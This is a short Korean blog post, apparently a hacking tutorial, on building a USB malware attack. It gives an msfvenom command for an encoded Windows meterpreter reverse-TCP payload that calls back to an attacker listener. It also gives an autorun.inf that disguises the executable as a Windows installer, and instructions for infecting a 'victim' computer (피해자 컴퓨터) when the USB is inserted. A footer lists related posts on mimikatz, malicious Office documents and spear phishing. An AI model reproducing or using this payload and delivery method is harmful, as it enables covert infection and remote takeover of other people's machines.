1.악성코드 생성
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > virus.exe
-a : 아키텍처
-platform : 운영체제 선택
-p : 페이로드 선택
LHOST,LPORT : 내부 아이피와 포트 [본인에 맞게 설정]
-e : 인코딩
-b : bad character [\x00을 제외하고 인코딩 해라]
-i : 인코딩 횟수
-f : 파일 확장자명
2.autorun.inf 작성
[AutoRun]
OPEN=virus.EXE // 오픈할 파일 선택
ICON=setup.exe,0 // USB안의 setup.exe의 아이콘을 사용
ACTION=Start my application // usb 꽃으면 어떤 액션을 취할지 나오는 선택창 제목
LABEL=windows install // usb의 이름을 정해준것
악성코드의 이름을 다르게 지었거나 아이콘, 라벨명 등을 변경할경우 사용자 설정에 맞게 위 부분을 변경합니다.
3.usb에 악성코드와 autorun.inf를 넣고 피해자 컴퓨터에 꽃으면 usb에서 어떤 액션을 취할지 나오는 창에서
Start my application을 선택하면 감염
이 방법은 autorun.inf의 open과 action 기능이 사라진 윈7 이후 버전에는 적용되지 않습니다.
윈 xp와 윈 7 하위버전에서만 사용 가능할것 같습니다.
autorun.inf에 대한 사용법을 알아두는 것만으로도 도움이 될거같네요.
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
exploit-db 자바 CMM [자바 version7 취약점] (0) | 2023.12.27 |
---|---|
mimikatz를 사용해서 윈도우 패스워드 알아내기 (0) | 2023.12.27 |
MS오피스 문서파일로 악성코드 만들기 (0) | 2023.12.27 |
스피어 피싱 공격 [코발트 스트라이크,이메일 파싱] (0) | 2023.12.27 |
껐다 켜도 해킹 세션을 유지시키는 방법 [persistence] (0) | 2023.12.27 |